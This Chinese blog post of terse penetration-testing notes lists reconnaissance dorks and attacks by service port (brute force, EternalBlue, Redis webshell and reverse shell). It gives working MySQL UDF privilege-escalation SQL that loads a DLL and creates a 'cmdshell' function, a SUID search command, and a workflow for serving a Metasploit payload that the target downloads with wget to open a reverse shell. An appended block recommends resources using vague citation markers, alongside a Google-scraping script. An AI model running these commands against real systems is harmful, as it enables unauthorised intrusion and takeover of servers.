简单渗透实战

信息收集

google

site:edu.cn intext:后台管理 //限定后缀查找内容

inurl:github.com xx //限定网页查找

fofa

shodan

21 FTP 匿名访问爆破

22 ssh 爆破九头蛇 msf 工具...

445 永恒之蓝 ms17-01 0

1433 sql server 爆破 xp_ cmdshell提权

3306 mysq|爆破 root 提权 udf提权

6379 redis 未授权访问 写公钥 写webshell 定时任务 反弹shell 主从复制RCE

7001/7002 weblogic java的反序列化 弱口令

8080/8089 jboss Jenkins java反序列化弱口令

27017/27018 MongoDB 爆破 未授权

888/8888宝塔

dirsearch 扫描 //比较多自定义,当全部返回200时候可以利用字节大小去除

拿站

bp

sqllmap

csrf

文件上传

rce

ssrf

蚁剑

插件提权

mysql udf提权 //需要通过数据库连接,用户必须权限足够

select version();      #查看版本
如果版本号大于5.1.4 上传udf的位置应该放在mysql\lib\plugin【如果不存在目录 自己新建一个】
如果版本小于5.1 上传udf的位置应该放在c盘的windows或者windows32目录里
​
show variables like "%plugin%"    #查看plugin位置
show variables like "%secure%"    #查看secure_file_priv,NULL才可以提权
show variables like "%compile%";     #查看数据库是多少位的
​
cd /usr/share/metasploit-framework/data/exploit/mysql  //kali下载udf 文件末为.so,则为linux系统,如果是win,则后缀为dll
ls -la
​
python -m http.server  //kali开服务器下载udf
create function cmdshell returns string soname 'myudf.dll'; //cmdshell是自定义函数,可以更换
​
select cmdshell('whoami');
​
#只能连接数据库的提权
create table udfeval(shellcode longblob);    #创建表
​
insert into udfeval values(load_file('F:/udf.dll'));  #在表里插入信息
​
select shellcode from udfeval into dumpfile 'C:\\windows\udf.dll';  #将表里面的信息导出
​
create function cmdshell returns string soname 'F:/phpstudy/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll';
​
select * from func;
​
select cmdshell('whoami');

linux提权

find / -perm -u=s -type f 2>/dev/null //寻找提权命令

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool msf运行.sh

cs

msf

  1. msf生成elf/exe马

  2. python -m httpserver 服务器开启下载

  3. wegt ip/shell 目标主机连接下载

  4. chmod -x shell 给权限后运行

  5. use exploit/muti/handler 配置msf监听上线,反弹


                
### 冰河渗透测试实战笔记的相关资源 冰河的《渗透测试实战笔记》是一本专注于实际操作和技术应用的安全类电子书,其内容涵盖了大量实用的技术案例和实践经验[^1]。该书的特点在于注重实战而非单纯理论讲解,适合初学者快速入门并实践网络安全领域中的渗透测试技能。 #### 资源获取方式 对于希望获得此电子书或其他相关教程的学习者来说,可以尝试通过以下途径寻找相关内容: 1. **官方网站或作者博客** 通常情况下,安全技术书籍的作者会在个人网站或者博客中分享部分章节预览以及购买链接。例如,《冰河的渗透实战笔记》可能在其官网提供试读版下载或详细介绍页面[^2]。 2. **在线学习平台** 像 Udemy、Coursera 这样的教育平台上可能会有基于此类主题开发的课程。虽然这些课程未必完全复制自某一本特定书籍,但它们往往能够补充更多动态演示视频等内容形式,帮助理解复杂概念。 3. **GitHub 开源项目** 鉴于提到过编写过多本开源电子书的经历[^3],不妨前往 GitHub 搜索是否有类似的公开仓库存在。“IceRiver”作为关键词配合其他限定条件(如 `in:title`),或许能找到一些有价值的资料集合。 4. **社区论坛交流区** Hacker News、Reddit 的 r/netsec 子板块都是讨论信息安全话题的好地方,在那里提问关于具体教材的需求也容易引起志同道合者的注意进而得到推荐清单。 5. **图书馆借阅服务** 如果所在地区支持数字化馆藏,则可以直接查询本地公共/大学图书馆是否收录了目标作品;即使未找到确切版本号也可能发现相似替代品供参考之用。 以下是实现简单爬虫脚本来抓取网络上潜在可用链接的一个 Python 示例程序片段: ```python import requests from bs4 import BeautifulSoup def search_resources(query): url = f"https://www.google.com/search?q={query}" headers = {"User-Agent": "Mozilla/5.0"} response = requests.get(url, headers=headers) soup = BeautifulSoup(response.text, 'html.parser') results = [] for item in soup.select('.tF2Cxc'): title = item.find('h3').get_text() link = item.find('a')['href'] snippet = item.find('span', class_='st').get_text() result = { "title": title, "link": link, "snippet": snippet } results.append(result) return results if __name__ == "__main__": query = input("Enter your query: ") resources = search_resources(query) for res in resources[:5]: print(f"{res['title']}\n{res['link']}\n{res['snippet']}\n") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值